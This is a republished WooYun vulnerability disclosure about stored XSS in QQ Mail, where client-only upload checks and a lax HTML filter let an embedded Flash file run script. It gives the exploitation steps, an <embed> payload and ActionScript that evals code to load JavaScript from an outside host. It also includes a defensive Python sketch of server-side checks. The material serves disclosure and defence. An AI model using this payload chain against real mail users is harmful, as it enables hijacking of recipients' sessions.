XSS in QQ mail, which can call external javascript files

Source: Internet
Author: User

 

Brief description:

This is an old vulnerability that was reported before. After consulting wooyun, the reply was that I could submit it. So I submitted the vulnerability, hoping to earn Rank!

 

Vulnerability: QQ Mail does not check the file type of uploaded image attachments on the server, and its HTML filter does not strip the <embed> tag. Combining the two, a Flash (SWF) file can be uploaded and embedded in a mail, and the Flash file can then load an arbitrary JavaScript file.

Detailed description:

Major causes of vulnerabilities:

 

1. The upload of image attachments is checked only on the client; the server performs no check at all, so the restriction can be bypassed to upload any file type (here this is used to upload a Flash file ~)!

2. The HTML filter is flawed. When src is a relative path, as in <embed src="relative path" type="application/x-shockwave-flash"></embed>, the embed tag is not filtered out!
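As an added example (not code from the original report or from QQ Mail), the following Python shows the two server-side checks whose absence causes the problem above: the upload decision is based on the file's leading bytes rather than the client's declared type, and the HTML filter drops plugin tags no matter how src is written. The function names and the constructed sample inputs are my own.

```python
import re

# SWF signatures: uncompressed "FWS", zlib-compressed "CWS", LZMA-compressed "ZWS".
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")

# Leading bytes of the image formats an attachment upload should accept.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_image_type(data: bytes):
    """Return the image MIME type implied by the leading bytes, or None."""
    for magic, mime in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def accept_image_upload(data: bytes, declared_type: str):
    """Server-side decision: trust the bytes, never the client's declared type.

    Returns (accepted, detail) where detail is the MIME type or the reason.
    """
    if data[:3] in SWF_MAGIC:
        return False, "SWF rejected"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "not a recognised image"
    if sniffed != declared_type:
        return False, f"declared {declared_type}, content is {sniffed}"
    return True, sniffed


# Opening and closing tags that load plugin or script content. The pattern
# ignores attribute spacing, tag case and whether src is absolute or relative.
ACTIVE_TAG_RE = re.compile(
    r"<\s*/?\s*(embed|object|applet|script|iframe)\b[^>]*>", re.I | re.S
)


def sanitize_mail_html(html: str) -> str:
    """Strip plugin/script tags from HTML mail bodies before storing them."""
    return ACTIVE_TAG_RE.sub("", html)
```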

 

Proof of vulnerability:

The following describes how the vulnerability is exploited!

 

1. The file type is verified only on the client. When I go to the image attachment upload location in my QQ mailbox and upload a Flash file, the following prompt is displayed!


2. Packet capture shows that no request is sent when this prompt appears, that is, the check is made by the client!

 

3. Since only the client checks, we can upload files of other types ourselves (how to bypass the client restriction is not covered here). Result: files of any type, not just images, can be uploaded. So we upload a Flash file of our own.


On the upload result page, the address of the uploaded Flash file can be found.

 

4. Compose an email, switch to HTML mode, and enter the following content:

 

<embed src="the copied FLASH file address" type="application/x-shockwave-flash"></embed>

 

5. Send the email. When the recipient opens it, the effect is as follows (works in IE, Chrome and Firefox):


6. Because the <embed> tag carries no allowscriptaccess or allownetworking attribute to restrict the Flash file's permissions, executing JS code from the Flash file is not restricted.

 

Finally, the ActionScript code of the Flash file is attached:

 

    package {
        import flash.display.Sprite;
        import flash.external.ExternalInterface;

        public class QQmailTest extends Sprite {
            public function QQmailTest() {
                // ExternalInterface is only available when the hosting page allows script access
                if (ExternalInterface.available) {
                    // Ask the hosting page to eval a snippet that appends an external <script> tag
                    ExternalInterface.call("eval",
                        "(function(){var s=document.createElement('script');s.type='text/javascript';s.src='http://www.toolmao.com/tool/qqmail.js';document.body.appendChild(s);})()");
                }
            }
        }
    }

 

Solution:

The vulnerability has been fixed by the vendor.

 

 

Author: gainover @ wooyun
